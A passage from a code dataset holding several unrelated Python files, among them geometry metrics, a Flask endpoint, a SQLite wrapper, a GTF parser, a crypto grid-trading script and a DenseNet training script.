other.op:\r\n return sum((self.items - other.items).values()) == 0\r\n return False\r\n\r\n\r\nclass op_pendulum:\r\n def __init__(self, definition):\r\n reader = 0\r\n self.stacks = []\r\n while reader < len(definition):\r\n op = definition[reader]\r\n items = []\r\n while definition[reader] == op:\r\n reader += 1\r\n next_reader = min(\r\n len(definition) \r\n if definition.find('+', reader) == -1 else\r\n definition.find('+', reader),\r\n len(definition) \r\n if definition.find('*', reader) == -1 else\r\n definition.find('*', reader),\r\n )\r\n if next_reader < len(definition):\r\n items.append(int(definition[reader:next_reader]))\r\n reader = next_reader\r\n else:\r\n items.append(int(definition[reader:]))\r\n reader = len(definition)\r\n break\r\n self.stacks.append(op_stack(op, items))\r\n if self.stacks[-1].is_empty():\r\n self.stacks.pop()\r\n elif self.stacks[-1].is_reaper():\r\n self.stacks = []\r\n items = []\r\n op = '*' if op == '+' else '+'\r\n\r\n def __eq__(self, other):\r\n if isinstance(other, op_pendulum):\r\n if len(self.stacks) == len(other.stacks):\r\n for a, b in zip(self.stacks, other.stacks):\r\n if not (a == b):\r\n return False\r\n return True\r\n return False\r\n\r\n\r\nif __name__ == \"__main__\":\r\n a = op_pendulum(sys.argv[1])\r\n b = op_pendulum(sys.argv[2])\r\n sys.stdout.write(str(a == b))\r\n sys.stdout.flush()\r\n sys.exit(0)\r\n","sub_path":"ops_equivalence.py","file_name":"ops_equivalence.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"431061","text":"import numpy as np\nimport os\n\n\ndef calcMops(true_positives, false_negatives, false_positives):\n s = {\n 'recall': true_positives / (true_positives + false_negatives),\n 'precision': true_positives / (true_positives + false_positives),\n 'jaccardIndex': true_positives / (true_positives + false_negatives + false_positives),\n 'branchingFactor': false_positives / true_positives,\n 'missFactor': false_negatives / true_positives,\n }\n s['completeness'] = s['recall']\n s['correctness'] = s['precision']\n s['fscore'] = (2 * s['recall'] * s['precision']) / (s['recall'] + s['precision'])\n return s\n\n\ndef run_threshold_geometry_metrics(refDSM, refDTM, refMask, testDSM, testDTM, testMask,\n tform, ignoreMask):\n refHgt = (refDSM - refDTM)\n refObj = refHgt\n refObj[~refMask] = 0\n\n testHgt = (testDSM - testDTM)\n testObj = np.copy(testHgt)\n testObj[~testMask] = 0\n\n # Make metrics\n refOnlyMask = refMask & ~testMask\n testOnlyMask = testMask & ~refMask\n overlapMask = refMask & testMask\n\n # Apply ignore mask\n refOnlyMask = refOnlyMask & ~ignoreMask\n testOnlyMask = testOnlyMask & ~ignoreMask\n overlapMask = overlapMask & ~ignoreMask\n\n # Determine evaluation units.\n unitArea = abs(tform[1] * tform[5])\n\n # --- Hard Error ------------------------------------------------------\n # Regions that are 2D False Positives or False Negatives, are\n # all or nothing. These regions don't consider overlap in the\n # underlying terrain models\n\n # -------- False Positive ---------------------------------------------\n unitCountFP = np.sum(testOnlyMask)\n oobFP = np.sum(testOnlyMask * testObj) * unitArea\n\n # -------- False Negative ---------------------------------------------\n unitCountFN = np.sum(refOnlyMask)\n oobFN = np.sum(refOnlyMask * refObj) * unitArea\n\n # --- Soft Error ------------------------------------------------------\n # Regions that are 2D True Positive\n\n # For both below:\n # Positive values are False Positives\n # Negative values are False Negatives\n deltaTop = testDSM - refDSM\n deltaBot = refDTM - testDTM\n\n # Regions that are 2D True Positives\n unitCountTP = np.sum(overlapMask)\n overlap = overlapMask * (testObj - refObj)\n overlap[np.isnan(overlap)] = 0\n\n # -------- False Positive -------------------------------------------------\n false_positives = np.nansum((deltaTop > 0) * deltaTop * overlapMask) * unitArea + \\\n np.nansum((deltaBot > 0) * deltaBot * overlapMask) * unitArea\n\n # -------- False Negative -------------------------------------------------\n false_negatives = -np.nansum((deltaTop < 0) * deltaTop * overlapMask) * unitArea + \\\n -np.nansum((deltaBot < 0) * deltaBot * overlapMask) * unitArea\n\n # -------- True Positive ---------------------------------------------------\n true_positives = np.nansum(refObj * overlapMask) * unitArea - false_negatives\n tolFP = false_positives + oobFP\n tolFN = false_negatives + oobFN\n tolTP = true_positives\n\n metrics = {\n '2D': calcMops(unitCountTP, unitCountFN, unitCountFP),\n '3D': calcMops(tolTP, tolFN, tolFP),\n }\n\n return metrics\n","sub_path":"core3dmetrics/geometrics/threshold_geometry_metrics.py","file_name":"threshold_geometry_metrics.py","file_ext":"py","file_size_in_byte":3260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"604468824","text":"#查看缺少实参的错误提示\n#罗旭阳,2019/01/30\ndef pet(pet_name, animal_type = \"dog\"):\n\tprint(\"My pet name is \" + pet_name.title() + \".\" )\n\tprint(\"And it is a \" + animal_type + \".\")\n\n#位置形参,加默认值实参\npet(\"alice\")\n\n#缺少一个参数\n#pet()\n\n#关键字参数对\npet(animal_type = \"cat\", pet_name = \"jack\")\n","sub_path":"pet_function.py","file_name":"pet_function.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"172540757","text":"from flask import Flask, request, jsonify\r\nfrom flask_restful import Resource, Api, reqparse, abort\r\n\r\napp = Flask(__name__)\r\napi = Api(app)\r\n\r\n\r\n\r\n\"\"\"\r\nTest Code\r\nurl = 'curl -i -H \\\"Content-Type: application/json\\\" -X POST -d ' + '\\'' + total_request + '\\'' + ' http://127.0.0.1:5050/Test'\r\ncurl -i -H \"Content-Type: application/json\" -X POST -d '{\"Hello\":\"hi\"}' http://127.0.0.1:7070/MECrcaserver\r\nos.system(url)\r\n\"\"\"\r\n@app.route('/MECrcaserver',methods=['POST','PUT'])\r\ndef rca_server():\r\n if not request.json:\r\n abort(400)\r\n data = request.json\r\n print(data)\r\n # api_handler.start_action(data['action'],data)\r\n return ''\r\n\r\nif __name__ == '__main__':\r\n app.run(host='192.168.11.11',port = 7071,debug = True)\r\n","sub_path":"rca_server.py","file_name":"rca_server.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"379924968","text":"import aiosqlite\nimport os\nimport logging\nfrom pathlib import Path\n\nlog = logging.getLogger(__name__)\n\nclass Database:\n __slots__ = ('sql_path', 'db_path', 'cxn')\n\n def __init__(self, dynamic: Path, static: Path) -> None:\n self.sql_path = (static / 'build.sql').resolve()\n self.db_path = (dynamic / 'database.db').resolve()\n\n async def connect(self) -> aiosqlite.Connection:\n self.cxn = await aiosqlite.connect(self.db_path)\n await self.cxn.executescript(self.sql_path.read_text())\n await self.cxn.commit()\n return self.cxn\n\n async def commit(self) -> None:\n await self.cxn.commit()\n\n async def close(self) -> None:\n await self.cxn.close()\n\n async def execute(self, query: str, *args) -> None:\n try:\n await self.cxn.execute(query, args)\n except Exception as e:\n log.error(f\"❌ {e}\")\n raise e\n\n async def fetchall(self, query: str, *args) -> list:\n try:\n return await self.cxn.execute(query, args).fetchall()\n except Exception as e:\n log.error(f\"❌ {e}\")\n raise e\n\n async def fetchone(self, query: str, *args) -> tuple:\n try:\n return await self.cxn.execute(query, args).fetchone()\n except Exception as e:\n log.error(f\"❌ {e}\")\n raise e\n\n ","sub_path":"permafrost/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"288245285","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef forward (x,w1,b1,w2,b2):\r\n z = 1/(1+np.exp(-x.dot(w1)-b1))\r\n a = z.dot(w2) + b2\r\n aexp = np.exp(a)\r\n y = aexp/aexp.sum(axis=1, keepdims=True)\r\n return y, z\r\n \r\ndef classification_error(y,p):\r\n n_crct = 0 \r\n n_total = 0\r\n for i in range(len(y)):\r\n n_total += 1\r\n if y[i] == p[i]:\r\n n_crct += 1\r\n return float(n_crct)/ n_total\r\n\r\ndef cost(T, output):\r\n t = T* np.log(output)\r\n return t.sum()\r\n \r\ndef derivative_w2(hidden, T, output):\r\n re = hidden.T.dot(T - output)\r\n return re\r\n \r\ndef derivative_w1(x, hidden, T, output, w2):\r\n dZ = (T - output).dot(w2.T) * hidden * (1 - hidden)\r\n ret2 = x.T.dot(dZ)\r\n return ret2\r\n \r\ndef derivative_b2(T, output):\r\n re = (T-output).sum(axis=0)\r\n return re\r\n \r\ndef derivative_b1(T, Y, W2, Z):\r\n return ((T - Y).dot(W2.T) * Z * (1 - Z)).sum(axis=0)\r\n \r\n \r\n\r\ndef main():\r\n N = 500\r\n x1 = np.random.randn(N,2) + np.array([0,-2])\r\n x2 = np.random.randn(N,2) + np.array([2,2])\r\n x3 = np.random.randn(N,2) + np.array([-2,2])\r\n x = np.vstack([x1, x2, x3])\r\n \r\n \r\n D = 2#DIMENSIONS\r\n M = 3#NO OF NEURONS IN HIDDEN LAYER\r\n K = 3#NO OF CLASSES\r\n \r\n y = np.array([0]*N +[1]*N + [2]*N)\r\n N = len(y)\r\n T = np.zeros((N, K))\r\n for i in range(N):\r\n T[i, y[i]] = 1\r\n\r\n plt.scatter(x[:,0], x[:,1], c=y, alpha=0.5)\r\n plt.show()\r\n \r\n\r\n w1 = np.random.randn(D, M)\r\n b1 = np.random.randn(M)\r\n w2 = np.random.randn(M, K)\r\n b2 = np.random.randn(K)\r\n\r\n learning_rate = 10e-7\r\n costs = []\r\n for epoch in range(1000):\r\n output, hidden = forward(x,w1,b1,w2,b2)\r\n if epoch%500 == 0 :\r\n c = cost(T, output)\r\n P = np.argmax(output, axis =1)\r\n r = classification_error(y, P)\r\n print(\"cost:\", c, \"classification_rate:\", r)\r\n costs.append(c)\r\n print(w2.shape,derivative_w2(hidden, T, output).shape,T.shape,hidden.shape)\r\n \r\n w2 += learning_rate * derivative_w2(hidden, T, output)\r\n b2 += learning_rate * derivative_b2(T, output)\r\n w1 += learning_rate * derivative_w1(x, hidden, T, output, w2)\r\n b1 += learning_rate * derivative_b1(T, output, w2, hidden)\r\n\r\n plt.plot(costs)\r\n plt.show() \r\n \r\nif __name__=='__main__':\r\n main()","sub_path":"Deep_learning/backpropg.py","file_name":"backpropg.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"545678562","text":"from __future__ import annotations\n\nimport json\nfrom logging import Formatter, LogRecord\n\n\nclass JSONFormatter(Formatter):\n \"\"\"\n JSON log formatter\n\n Configuration::\n\n from tiger.logs import JSONFormatter\n\n handler = logging.StreamHandler(sys.stdout)\n handler.setFormatter(JSONFormatter())\n logger = logging.getLogger('tiger')\n logger.setLevel(logging.DEBUG)\n logger.addHandler(handler)\n\n Usage::\n\n logger.info('Connection established')\n logger.error('Could not connect to server', exc_info=True)\n\n Output::\n\n {\n \"tag\": \"tiger\",\n \"level\": \"INFO\",\n \"created\": 1551819415.017764,\n \"message\": \"Connection established\"\n }\n\n {\n \"tag\": \"tiger\",\n \"level\": \"ERROR\",\n \"created\": 1551819292.640645,\n \"message\": \"Could not connect to server\",\n \"exception\": \"Traceback (most recent call last): ... Connection refused by the server\"\n }\n \"\"\"\n\n def format(self, record: LogRecord) -> str:\n json_record = {\n \"tag\": record.name,\n \"level\": record.levelname,\n \"created\": record.created,\n \"message\": record.getMessage(),\n }\n\n if record.exc_info:\n json_record[\"exception\"] = self.formatException(record.exc_info)\n\n return json.dumps(json_record, ensure_ascii=False)\n","sub_path":"tiger/logging/formatter.py","file_name":"formatter.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"474656480","text":"import pandas\n\nfrom . import feature\n\nSOURCE = \"transcript_utils\"\nMISSING_VALUE = \".\"\n\n\nclass GtfRow(object):\n SEQNAME_COL = 0\n FEATURE_COL = 2\n START_COL = 3\n END_COL = 4\n STRAND_COL = 6\n ATTRIBUTES_COL = 8\n\n EXON_FEATURE = \"exon\"\n\n GENE_ID_ATTRIBUTE = \"gene_id\"\n TRANSCRIPT_ID_ATTRIBUTE = \"transcript_id\"\n\n @classmethod\n def from_file(cls, row_data):\n strip_quotes = lambda x: x.replace('\"', '')\n attr_str = row_data[GtfRow.ATTRIBUTES_COL]\n attr_dict = {attr: strip_quotes(val) for attr, val in\n [av.split(\" \", 1) for av in attr_str.split(\"; \")]}\n\n return GtfRow(row_data, attr_dict)\n\n @classmethod\n def from_values(cls, seqname, feature_type, start, end,\n strand, gene, transcript):\n\n row_data = [seqname, SOURCE, feature_type, start, end,\n MISSING_VALUE, strand, MISSING_VALUE]\n attr_dict = {GtfRow.GENE_ID_ATTRIBUTE: gene,\n GtfRow.TRANSCRIPT_ID_ATTRIBUTE: transcript}\n\n return GtfRow(row_data, attr_dict)\n\n def __init__(self, row_data, attr_dict):\n self.row_data = row_data\n self.attr_dict = attr_dict\n\n def get_seqname(self):\n return self.row_data[GtfRow.SEQNAME_COL]\n\n def get_feature(self):\n return self.row_data[GtfRow.FEATURE_COL]\n\n def get_start(self):\n return self.row_data[GtfRow.START_COL]\n\n def get_end(self):\n return self.row_data[GtfRow.END_COL]\n\n def get_strand(self):\n return self.row_data[GtfRow.STRAND_COL]\n\n def get_gene(self):\n return self.attr_dict[GtfRow.GENE_ID_ATTRIBUTE]\n\n def get_transcript(self):\n return self.attr_dict[GtfRow.TRANSCRIPT_ID_ATTRIBUTE]\n\n def is_exon(self):\n return self.get_feature() == GtfRow.EXON_FEATURE\n\n def __str__(self):\n fields = list(self.row_data)\n\n attr_str = \"; \".join([\"{k} \\\"{v}\\\"\".format(k=k, v=v)\n for k, v in iter(self.attr_dict.items())])\n\n fields.append(attr_str)\n\n return \"\\t\".join([str(field) for field in fields])\n\n\nclass GtfInfo(object):\n def __init__(self, gtf_file, logger):\n self.gtf_file = gtf_file\n self.data = pandas.read_csv(\n gtf_file, sep=\"\\t\", header=None, comment=\"#\")\n self.logger = logger\n\n def rows(self):\n for index, row in self.data.iterrows():\n yield GtfRow.from_file(row)\n\n def get_transcript_info(self):\n self.logger.info(\"Reading transcript info...\")\n\n transcript_info = {}\n lines_processed = 0\n\n for row in self.rows():\n lines_processed += 1\n if lines_processed % 10000 == 0:\n self.logger.debug(\"Processed {l} GTF lines.\".format(l=lines_processed))\n\n if not row.is_exon():\n continue\n\n gene_name = row.get_gene()\n\n gene = None\n if gene_name in transcript_info:\n gene = transcript_info[gene_name]\n else:\n gene = feature.Gene(row)\n transcript_info[gene_name] = gene\n\n transcript = gene.add_transcript(row)\n transcript.add_exon(row)\n\n self.logger.info(\"...read transcript information for {g} genes\".format(\n g=len(transcript_info)))\n\n return transcript_info\n","sub_path":"transcript_utils/gtf.py","file_name":"gtf.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"503945077","text":"'''backtest\nstart: 2020-02-22 00:00:00\nend: 2020-04-06 00:00:00\nperiod: 1h\nexchanges: [{\"eid\":\"Futures_OKCoin\",\"currency\":\"BTC_USD\"}]\n'''\nimport sys\nimport pandas as pd\nimport datetime\n# from fmz import *\n# task = VCtx(__doc__)\n\ninit_counter = exchange.GetPosition()[0]\nmax_price = 7000\nmin_price = 6000\nmid_price = min_price + (max_price - min_price)/2\nnet_sum = 40\nnet_price = ((max_price - min_price)/2)/net_sum\nnet_position = (init_counter * 3) / (100 * net_sum)\nif (max_price - min_price)/min_price > 0.2:\n print(\"[-- 价格区间设置错误,区间差价大于20% --]\")\n sys.exit(0)\n\nclass Exchange:\n # 交易回测引擎\n def __init__(self, trade_symbols, leverage=20, commission=0.00005, initial_balance=10000, log=False):\n self.initial_balance = initial_balance # 初始的资产\n self.commission = commission\n self.leverage = leverage\n self.trade_symbols = trade_symbols\n self.date = ''\n self.log = log\n self.df = pd.DataFrame(columns=['margin', 'total', 'leverage', 'realised_profit', 'unrealised_profit'])\n self.account = {'USDT': {'realised_profit': 0, 'margin': 0, 'unrealised_profit': 0, 'total': initial_balance,\n 'leverage': 0}}\n for symbol in trade_symbols:\n self.account[symbol] = {'amount': 0, 'hold_price': 0, 'value': 0, 'price': 0, 'realised_profit': 0,\n 'margin': 0, 'unrealised_profit': 0}\n\n def Trade(self, symbol, direction, price, amount, msg=''):\n if self.date and self.log:\n print('%-20s%-5s%-5s%-10.8s%-8.6s %s' % (\n str(self.date), symbol, 'buy' if direction == 1 else 'sell', price, amount, msg))\n\n cover_amount = 0 if direction * self.account[symbol]['amount'] >= 0 else min(\n abs(self.account[symbol]['amount']), amount)\n open_amount = amount - cover_amount\n\n self.account['USDT']['realised_profit'] -= price * amount * self.commission # 扣除手续费\n\n if cover_amount > 0: # 先平仓\n self.account['USDT']['realised_profit'] += -direction * (\n price - self.account[symbol]['hold_price']) * cover_amount # 利润\n self.account['USDT']['margin'] -= cover_amount * self.account[symbol]['hold_price'] / self.leverage # 释放保证金\n\n self.account[symbol]['realised_profit'] += -direction * (\n price - self.account[symbol]['hold_price']) * cover_amount\n self.account[symbol]['amount'] -= -direction * cover_amount\n self.account[symbol]['margin'] -= cover_amount * self.account[symbol]['hold_price'] / self.leverage\n self.account[symbol]['hold_price'] = 0 if self.account[symbol]['amount'] == 0 else self.account[symbol][\n 'hold_price']\n\n if open_amount > 0:\n total_cost = self.account[symbol]['hold_price'] * direction * self.account[symbol][\n 'amount'] + price * open_amount\n total_amount = direction * self.account[symbol]['amount'] + open_amount\n\n self.account['USDT']['margin'] += open_amount * price / self.leverage\n self.account[symbol]['hold_price'] = total_cost / total_amount\n self.account[symbol]['amount'] += direction * open_amount\n self.account[symbol]['margin'] += open_amount * price / self.leverage\n\n self.account[symbol]['unrealised_profit'] = (price - self.account[symbol]['hold_price']) * self.account[symbol][\n 'amount']\n self.account[symbol]['price'] = price\n self.account[symbol]['value'] = abs(self.account[symbol]['amount']) * price\n\n return True\n\n def Buy(self, symbol, price, amount, msg=''):\n self.Trade(symbol, 1, price, amount, msg)\n\n def Sell(self, symbol, price, amount, msg=''):\n self.Trade(symbol, -1, price, amount, msg)\n\n def Update(self, date, close_price): # 对资产进行更新\n self.date = date\n self.close = close_price\n self.account['USDT']['unrealised_profit'] = 0\n for symbol in self.trade_symbols:\n if np.isnan(close_price[symbol]):\n continue\n self.account[symbol]['unrealised_profit'] = (close_price[symbol] - self.account[symbol]['hold_price']) * \\\n self.account[symbol]['amount']\n self.account[symbol]['price'] = close_price[symbol]\n self.account[symbol]['value'] = abs(self.account[symbol]['amount']) * close_price[symbol]\n self.account['USDT']['unrealised_profit'] += self.account[symbol]['unrealised_profit']\n if self.date.hour in [0, 8, 16]:\n pass\n self.account['USDT']['realised_profit'] += -self.account[symbol]['amount'] * close_price[\n symbol] * 0.01 / 100\n\n self.account['USDT']['total'] = round(\n self.account['USDT']['realised_profit'] + self.initial_balance + self.account['USDT']['unrealised_profit'],\n 6)\n self.account['USDT']['leverage'] = round(self.account['USDT']['margin'] / self.account['USDT']['total'],\n 4) * self.leverage\n self.df.loc[self.date] = [self.account['USDT']['margin'], self.account['USDT']['total'],\n self.account['USDT']['leverage'], self.account['USDT']['realised_profit'],\n self.account['USDT']['unrealised_profit']]\n\nclass StopPolicy(object):\n # 止盈止损策略\n def __init__(self):\n pass\n\n def stop_loss(self):\n pass\n\n def stop_profit(self):\n pass\n\nkongtou_trade_list = []\nduotou_trade_list = []\nwhile True:\n ticker = exchange.GetTicker()\n price = ticker['Last']\n if (price >= mid_price) and (price < max_price): # 空头\n if len(kongtou_trade_list) > 0:\n last_trade = kongtou_trade_list[-1]\n if price - last_trade['open_price'] >= net_price: # 开空\n exchange.SetDirection(\"sell\")\n exchange.Sell(price - 10, net_position)\n Log(\"[== 开空头仓 ==]: 开仓价格:{} 网格id:{}\".format((price+0.2), len(kongtou_trade_list)))\n kongtou_trade_list.append({\"open_price: \": (price + 0.2),\n \"net_id: \": len(kongtou_trade_list),\n \"direction: \": \"kong\"})\n if last_trade['open_price'] - price > net_price: # 平空\n exchange.SetDirection(\"closesell\")\n exchange.Buy((price+0.2), net_position)\n Log(\"[== 平空头仓 ==]:平仓价格:{} 网格id:{}\".format((price+0.2), len(kongtou_trade_list)))\n del kongtou_trade_list[-1]\n if len(kongtou_trade_list) == 0:\n if (price - mid_price) > net_price:\n exchange.SetDirection(\"sell\")\n exchange.Sell(price - 0.2, net_position)\n Log(\"[== 开空头仓 ==]: 开仓价格:{} 网格id:{}\".format((price-0.2), len(kongtou_trade_list)))\n\n if (price < mid_price) and (price > min_price): # 多头\n if len(duotou_trade_list) > 0:\n last_trade = duotou_trade_list[-1]\n if last_trade['open_price'] - price >= net_price: # 开多\n exchange.SetDirection(\"buy\")\n exchange.Buy(price+0.2, net_position)\n Log(\"[== 开多头仓 ==]: 开仓价格:{} 网格id:{}\".format((price+0.2), len(duotou_trade_list)))\n duotou_trade_list.append({\"open_price: \": (price + 0.2),\n \"net_id: \": len(duotou_trade_list),\n \"direction: \": \"duo\"})\n if price - last_trade['open_price'] > net_price: # 平多\n exchange.SetDirection(\"closebuy\")\n exchange.Sell(price-0.2, net_position)\n Log(\"[== 平多头仓 ==]:平仓价格:{} 网格id:{}\".format((price-0.2), len(duotou_trade_list)))\n del duotou_trade_list[-1]\n if len(duotou_trade_list) == 0:\n if (mid_price - price) > net_price:\n exchange.SetDirection(\"buy\")\n exchange.Buy(price+0.2, net_position)\n Log(\"[== 开多头仓 ==]: 开仓价格:{} 网格id:{}\".format((price+0.2), len(duotou_trade_list)))\n\n if (price > max_price) or (price < min_price):\n Log(\"[-- 价格已经突破了区间,所有仓位都将平掉。程序也将退出 --]\")\n if len(kongtou_trade_list) > 0:\n exchange.SetDirection(\"closesell\")\n exchange.Buy((price + 10), net_position*len(kongtou_trade_list))\n if len(duotou_trade_list) > 0:\n exchange.SetDirection(\"closebuy\")\n exchange.Sell(price - 10, net_position*len(duotou_trade_list))\n sys.exit(0)\n Sleep(1000*3)","sub_path":"Easy_net.py","file_name":"Easy_net.py","file_ext":"py","file_size_in_byte":8968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"46207091","text":"# Import Libraries\nimport torch\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport torchvision.models as models\nimport torch.nn as nn\nimport torch.optim as optim\nimport numpy as np\nfrom PIL import Image\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\n# Specify transforms using torchvision.transforms as transforms library\ntransformations = transforms.Compose([\n transforms.Resize(255),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n])\n\n# Load in each dataset and apply transformations using the torchvision.datasets as datasets library\ntrain_set = datasets.ImageFolder(\"RDDC_Train\", transform=transformations)\nval_set = datasets.ImageFolder(\"RDDC_Test\", transform=transformations)\n\nprint('The class labels are:', train_set.classes, '\\n')\n\n# Put into a Dataloader using torch library\nbatch_size = 32\ntrain_loader = torch.utils.data.DataLoader(train_set, batch_size=batch_size, shuffle=True)\nval_loader = torch.utils.data.DataLoader(val_set, batch_size=batch_size, shuffle=True)\n\n# Get pretrained model using torchvision.models as models library\nmodel = models.densenet161(pretrained=True)\n\n# Turn off training for their parameters\nfor param in model.parameters():\n param.requires_grad = False\n\n# Create new classifier for model using torch.nn as nn library\nclassifier_input = model.classifier.in_features\nnum_labels = 8\nclassifier = nn.Sequential(nn.Linear(classifier_input, 64),\n nn.ReLU(),\n nn.Linear(64, 32),\n nn.ReLU(),\n nn.Linear(32, num_labels),\n nn.LogSoftmax(dim=1))\n\n# Replace default classifier with new classifier\nmodel.classifier = classifier\n\n# Find the device available to use using torch library\nif torch.cuda.is_available():\n device = 'cuda'\nelse:\n device = 'cpu'\n\n# Move model to the device specified above\nmodel.to(device)\n\n# Set the error function using torch.nn as nn library\ncriterion = nn.NLLLoss()\n# Set the optimizer function using torch.optim as optim library\noptimizer = optim.Adam(model.classifier.parameters())\n\n# Training the Model\nepochs = 50\nstart_train = time.time()\nepoch_array = []\naccu_array = []\nD00_TPR_array = []\nD00_FPR_array = []\nD01_TPR_array = []\nD01_FPR_array = []\nD10_TPR_array = []\nD10_FPR_array = []\nD11_TPR_array = []\nD11_FPR_array = []\nD20_TPR_array = []\nD20_FPR_array = []\nD40_TPR_array = []\nD40_FPR_array = []\nD43_TPR_array = []\nD43_FPR_array = []\nD44_TPR_array = []\nD44_FPR_array = []\nD00_TPR_array.append(0)\nD00_FPR_array.append(0)\nD01_TPR_array.append(0)\nD01_FPR_array.append(0)\nD10_TPR_array.append(0)\nD10_FPR_array.append(0)\nD11_TPR_array.append(0)\nD11_FPR_array.append(0)\nD20_TPR_array.append(0)\nD20_FPR_array.append(0)\nD40_TPR_array.append(0)\nD40_FPR_array.append(0)\nD43_TPR_array.append(0)\nD43_FPR_array.append(0)\nD44_TPR_array.append(0)\nD44_FPR_array.append(0)\n\nfor epoch in range(epochs):\n display_epoch = epoch + 1\n print('Epoch:', display_epoch)\n epoch_array.append(display_epoch)\n train_loss = 0\n val_loss = 0\n accuracy = 0\n\n # Training the model\n model.train()\n counter = 0\n for inputs, labels in train_loader:\n # Move to device\n inputs, labels = inputs.to(device), labels.to(device)\n # Clear optimizers\n optimizer.zero_grad()\n # Forward pass\n output = model.forward(inputs)\n # Loss\n loss = criterion(output, labels)\n # Calculate gradients (backpropogation)\n loss.backward()\n # Adjust parameters based on gradients\n optimizer.step()\n # Add the loss to the training set's rnning loss\n train_loss += loss.item() * inputs.size(0)\n\n # Print the progress of our training\n counter += 1\n print(\"Batch:\", counter, \"out of\", len(train_loader))\n\n end_train = time.time()\n print('Finished Epoch', epoch + 1, 'Training in %0.2f minutes' % ((end_train - start_train) / 60))\n\n # Evaluating the model\n start_valid = time.time()\n model.eval()\n counter = 0\n\n total_classes = 8\n output = torch.randn(batch_size, total_classes) # refer to output after softmax\n target = torch.randint(0, total_classes, (batch_size,)) # labels\n confusion_matrix = torch.zeros(total_classes, total_classes)\n\n # Tell torch not to calculate gradients\n with torch.no_grad():\n for inputs, labels in val_loader:\n # Move to device\n inputs, labels = inputs.to(device), labels.to(device)\n # Forward pass\n output = model.forward(inputs)\n # Calculate Loss\n valloss = criterion(output, labels)\n # Add loss to the validation set's running loss\n val_loss += valloss.item() * inputs.size(0)\n\n # Since our model outputs a LogSoftmax, find the real\n # percentages by reversing the log function\n output = torch.exp(output)\n # Get the top class of the output\n top_p, top_class = output.topk(1, dim=1)\n # See how many of the classes were correct?\n equals = top_class == labels.view(*top_class.shape)\n # Calculate the mean (get the accuracy for this batch)\n # and add it to the running accuracy for this epoch\n accuracy += torch.mean(equals.type(torch.FloatTensor)).item()\n # Print the progress of our evaluation\n counter += 1\n print(\"Batch:\", counter, \"out of\", len(val_loader))\n\n _, preds = torch.max(output, 1)\n\n for p, t in zip(preds.view(-1), labels.view(-1)):\n confusion_matrix[p.long(), t.long()] += 1\n\n print(confusion_matrix)\n\n TP = confusion_matrix.diag()\n\n for c in range(total_classes):\n idx = torch.ones(total_classes).byte()\n idx[c] = 0\n TN = confusion_matrix[idx.nonzero()[:, None], idx.nonzero()].sum()\n FP = confusion_matrix[c, idx].sum()\n FN = confusion_matrix[idx, c].sum()\n\n sensitivity = (TP[c] / (TP[c] + FN))\n specificity = (TN / (TN + FP))\n FPR = 1 - specificity\n # re_call = (TP[c] / (TP[c] + FP))\n pre_cision = (TP[c] / (TP[c] + FN))\n f1_score = 2 * ((pre_cision * sensitivity) / (pre_cision + sensitivity))\n checking_c = c + 1\n if (checking_c == 1):\n D00_TPR_array.append(sensitivity)\n D00_FPR_array.append(FPR)\n elif (checking_c == 2):\n D01_TPR_array.append(sensitivity)\n D01_FPR_array.append(FPR)\n elif (checking_c == 3):\n D10_TPR_array.append(sensitivity)\n D10_FPR_array.append(FPR)\n elif (checking_c == 4):\n D11_TPR_array.append(sensitivity)\n D11_FPR_array.append(FPR)\n elif (checking_c == 5):\n D20_TPR_array.append(sensitivity)\n D20_FPR_array.append(FPR)\n elif (checking_c == 6):\n D40_TPR_array.append(sensitivity)\n D40_FPR_array.append(FPR)\n elif (checking_c == 7):\n D43_TPR_array.append(sensitivity)\n D43_FPR_array.append(FPR)\n else:\n D44_TPR_array.append(sensitivity)\n D44_FPR_array.append(FPR)\n\n print('Class {}\\nTP {}, TN {}, FP {}, FN {}'.format(c + 1, TP[c], TN, FP, FN))\n print('Sensitivity or Recall = {}'.format(sensitivity))\n print('Specificity = {}'.format(specificity))\n # print('Recall = {}'.format(re_call))\n print('Precision = {}'.format(pre_cision))\n print('F1 Score = {}'.format(f1_score))\n\n end_valid = time.time()\n print('Finished Epoch', epoch + 1, 'Validating in %0.2f minutes' % ((end_valid - start_valid) / 60))\n\n # Get the average loss for the entire epoch\n train_loss = train_loss / len(train_loader.dataset)\n valid_loss = val_loss / len(val_loader.dataset)\n\n record_accuracy = (accuracy / len(val_loader)) * 100\n print(\"Record Accuracy\", record_accuracy, \" in epoch\", display_epoch)\n accu_array.append(record_accuracy)\n\n # Print out the information\n print('Accuracy: %0.3f %%' % (accuracy / len(val_loader) * 100))\n print('Training Loss: {:.6f} ' '\\tValidation Loss: {:.6f}'.format(train_loss, valid_loss), '\\n')\n\n print('Total Time is %0.2f minutes' % ((end_valid - start_train) / 